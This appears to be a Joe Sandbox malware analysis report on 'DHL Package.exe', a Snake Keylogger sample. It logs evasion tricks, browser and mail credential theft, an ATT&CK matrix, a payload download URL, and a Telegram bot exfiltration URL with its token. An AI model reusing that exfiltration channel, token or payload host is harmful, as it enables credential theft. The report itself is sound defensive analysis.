            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\DHL Package.exeAPI/Special instruction interceptor: Address: 64CBCAD
            Source: C:\Users\user\Desktop\DHL Package.exeAPI/Special instruction interceptor: Address: 24CBCAD
            Source: C:\Users\user\Desktop\DHL Package.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeMemory allocated: 36EA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeMemory allocated: 36DF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\DHL Package.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\DHL Package.exe TID: 3220Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exe TID: 3220Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_00402902 FindFirstFileW,12_2_00402902
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_00406739 FindFirstFileW,FindClose,12_2_00406739
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_00405AED
            Source: C:\Users\user\Desktop\DHL Package.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeThread delayed: delay time: 600000Jump to behavior
            Source: DHL Package.exe, 0000000C.00000002.6260987034.0000000006A01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\DHL Package.exeAPI call chain: ExitProcess graph end nodegraph_0-4775
            Source: C:\Users\user\Desktop\DHL Package.exeAPI call chain: ExitProcess graph end nodegraph_0-4778
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_6CA71B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6CA71B5F
            Source: C:\Users\user\Desktop\DHL Package.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess created: C:\Users\user\Desktop\DHL Package.exe "C:\Users\user\Desktop\DHL Package.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeQueries volume information: C:\Users\user\Desktop\DHL Package.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
            Source: C:\Users\user\Desktop\DHL Package.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000C.00000002.6270895609.0000000037035000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.6270895609.000000003710E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR
            Source: Yara matchFile source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR
            Source: C:\Users\user\Desktop\DHL Package.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000C.00000002.6270895609.0000000037035000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.6270895609.000000003710E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR
            Source: Yara matchFile source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            11
            Masquerading
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            System Network Configuration Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS2
            File and Directory Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets115
            System Information Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            DHL Package.exe16%VirustotalBrowse
            DHL Package.exe5%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dll0%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll1%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            reallyfreegeoip.org0%VirustotalBrowse
            api.telegram.org2%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            checkip.dyndns.org0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://reallyfreegeoip.org/xml/102.129.252.169$0%Avira URL Cloudsafe
            http://checkip.dyndns.org/0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/102.129.252.1690%Avira URL Cloudsafe
            https://api.telegram.org0%Avira URL Cloudsafe
            http://monteveliz.cl/SjZVauFBbad87.bin0%Avira URL Cloudsafe
            https://api.telegram.org/bot0%Avira URL Cloudsafe
            https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake0%Avira URL Cloudsafe
            http://checkip.dyndns.org/0%VirustotalBrowse
            https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=68730%Avira URL Cloudsafe
            https://api.telegram.org1%VirustotalBrowse
            https://reallyfreegeoip.org0%Avira URL Cloudsafe
            https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
            http://www.quovadis.bm00%Avira URL Cloudsafe
            https://api.telegram.org/bot1%VirustotalBrowse
            https://support.google.com/chrome/?p=plugin_flash0%VirustotalBrowse
            https://reallyfreegeoip.org0%VirustotalBrowse
            http://checkip.dyndns.org0%Avira URL Cloudsafe
            http://checkip.dyndns.com0%Avira URL Cloudsafe
            http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
            https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
            http://api.telegram.org0%Avira URL Cloudsafe
            http://checkip.dyndns.com0%VirustotalBrowse
            http://checkip.dyndns.org0%VirustotalBrowse
            http://api.telegram.org2%VirustotalBrowse
            http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            monteveliz.cl
            172.93.120.113
            truefalse
              unknown
              reallyfreegeoip.org
              172.67.177.134
              truetrueunknown
              api.telegram.org
              149.154.167.220
              truetrueunknown
              checkip.dyndns.com
              132.226.247.73
              truefalseunknown
              checkip.dyndns.org
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://monteveliz.cl/SjZVauFBbad87.binfalse
              • Avira URL Cloud: safe
              unknown
              https://reallyfreegeoip.org/xml/102.129.252.169false
              • Avira URL Cloud: safe
              unknown
              http://checkip.dyndns.org/false
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snakefalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://api.telegram.orgDHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://reallyfreegeoip.org/xml/102.129.252.169$DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.telegram.org/botDHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://reallyfreegeoip.orgDHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://support.google.com/chrome/?p=plugin_flashDHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.quovadis.bm0DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://checkip.dyndns.orgDHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036F5F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://checkip.dyndns.comDHL Package.exe, 0000000C.00000002.6270895609.0000000036F5F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://nsis.sf.net/NSIS_ErrorErrorDHL Package.exe, 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL Package.exe, 00000000.00000000.1150512237.000000000040A000.00000008.00000001.01000000.00000003.sdmp, DHL Package.exe, 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://ocsp.quovadisoffshore.com0DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://api.telegram.orgDHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              149.154.167.220
              api.telegram.orgUnited Kingdom
              62041TELEGRAMRUtrue
              172.93.120.113
              monteveliz.clUnited States
              393960HOST4GEEKS-LLCUSfalse
              172.67.177.134
              reallyfreegeoip.orgUnited States
              13335CLOUDFLARENETUStrue
              132.226.247.73
              checkip.dyndns.comUnited States
              16989UTMEMUSfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1489281
              Start date and time:2024-08-07 09:24:16 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 15m 41s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Run name:Suspected Instruction Hammering
              Number of analysed new started processes analysed:16
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:DHL Package.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/10@4/4
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 191
              • Number of non-executed functions: 113
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com
              • Execution Graph export aborted for target DHL Package.exe, PID 4252 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              No simulations
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              149.154.167.220172301400953754d8492a9b0fc0b395ef62c8f93b9f3124709dbe7c9b8d65265071a8c7140875.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                Arrival_Notice_10008616062024.jsGet hashmaliciousAgentTeslaBrowse
                  Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    cYl7JWax8x.exeGet hashmaliciousKeyzetsu ClipperBrowse
                      JkHAUqMrbF.exeGet hashmaliciousDCRatBrowse
                        SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  172.93.120.113https://jtbtigers.com/bbyytGet hashmaliciousUnknownBrowse
                                    https://jtbtigers.com/bbyytGet hashmaliciousUnknownBrowse
                                      172.67.177.134z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          rSWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              z46PEDIDODECOMPRAURGENTE___F__D__P___.exeGet hashmaliciousSnake KeyloggerBrowse
                                                z13FAT9654578987.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                  GF87654000.BAT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    NOVO_PEDIDO_DE_COMPRA_____pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      e-dekont.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                        U prilogu je nova lista narudzbi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          132.226.247.73Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Proforma.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Import Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Import Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          Invoice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          SecuriteInfo.com.Exploit.CVE-2017-0199.04.Gen.20726.10183.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          SecuriteInfo.com.Win64.RATX-gen.14927.11050.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          IMG-5067730.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          EG240711 EG240712.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                          • checkip.dyndns.org/
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          checkip.dyndns.comhesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 158.101.44.242
                                                          Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 132.226.247.73
